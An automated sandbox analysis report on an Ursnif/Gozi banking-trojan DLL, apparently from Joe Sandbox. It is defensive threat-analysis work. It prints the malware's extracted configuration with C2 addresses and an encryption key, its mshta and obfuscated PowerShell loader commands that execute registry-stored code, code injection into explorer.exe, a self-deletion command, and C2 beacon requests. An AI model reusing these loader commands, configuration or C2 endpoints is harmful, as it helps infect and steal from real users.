Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VoevdOQpeU.dll

Overview

General Information

Sample Name:VoevdOQpeU.dll
Analysis ID:614287
MD5:ba155d8aed7ca303fcfc3f0248d218e1
SHA1:600453c21cdbecdbea9c825df4754b8a1829d649
SHA256:a5ea92139f59d185548e8f48d1ce65cbf54bf1e3e1930de221091017fd1d4f0a
Tags:dllGoziISFBUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Writes to foreign memory regions
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 1428 cmdline: loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5292 cmdline: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6956 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 7132 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • WerFault.exe (PID: 3084 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 6532 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6788 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6804 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6844 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4432 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 5388 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8,  *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.3.rundll32.exe.48994a0.7.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.2.rundll32.exe.49f0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                2.3.rundll32.exe.48994a0.7.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  2.3.rundll32.exe.4e7a4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.3.rundll32.exe.4f26940.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Windows Shell File Write to Suspicious Folder
                      Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 6532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
                      Sigma detected: Accessing WinAPI in PowerShell. Code Injection
                      Source: Threat createdAuthor: Nikita Nazarov, oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6612, StartAddress: 2BC1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3616
                      Sigma detected: Suspicious Remote Thread Created
                      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6612, StartAddress: 2BC1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3616
                      Sigma detected: MSHTA Spawning Windows Shell
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6532, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6612, ProcessName: powershell.exe
                      Sigma detected: Suspicious Call by Ordinal
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1796, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, ProcessId: 5292, ProcessName: rundll32.exe
                      Sigma detected: Mshta Spawning Windows Shell
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6532, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6612, ProcessName: powershell.exe
                      Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6956, ParentProcessName: control.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 7132, ProcessName: rundll32.exe
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6612, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline, ProcessId: 6788, ProcessName: csc.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6612, TargetFilename: C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6532, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6612, ProcessName: powershell.exe
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132951679509388866.6612.DefaultAppDomain.powershell
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6612, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6644, ProcessName: conhost.exe

                      Snort Signatures

                      Timestamp:04/23/22-08:12:19.910177 04/23/22-08:12:19.910177
                      SID:2033203
                      Source Port:49766
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/23/22-08:12:21.823792 04/23/22-08:12:21.823792
                      SID:2033203
                      Source Port:49766
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/23/22-08:11:59.593120 04/23/22-08:11:59.593120
                      SID:2033203
                      Source Port:49760
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/23/22-08:12:20.776897 04/23/22-08:12:20.776897
                      SID:2033203
                      Source Port:49766
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted file
                      Source: VoevdOQpeU.dllReversingLabs: Detection: 38%
                      Machine Learning detection for sample
                      Source: VoevdOQpeU.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F3072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_049F3072
                      Source: VoevdOQpeU.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.287938913.0000000000480000.00000002.00000001.01000000.00000003.sdmp, VoevdOQpeU.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580FCC0 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_0580FCC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580CE21 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_0580CE21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05805A14 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_05805A14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580591B wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0580591B

                      Networking

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49760 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49760 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49766 -> 146.70.35.138:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49766 -> 146.70.35.138:80
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 146.70.35.138 80Jump to behavior
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: Joe Sandbox ViewASN Name: TENET-1ZA TENET-1ZA
                      Source: Joe Sandbox ViewIP Address: 146.70.35.138 146.70.35.138
                      Source: global trafficHTTP traffic detected: GET /phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
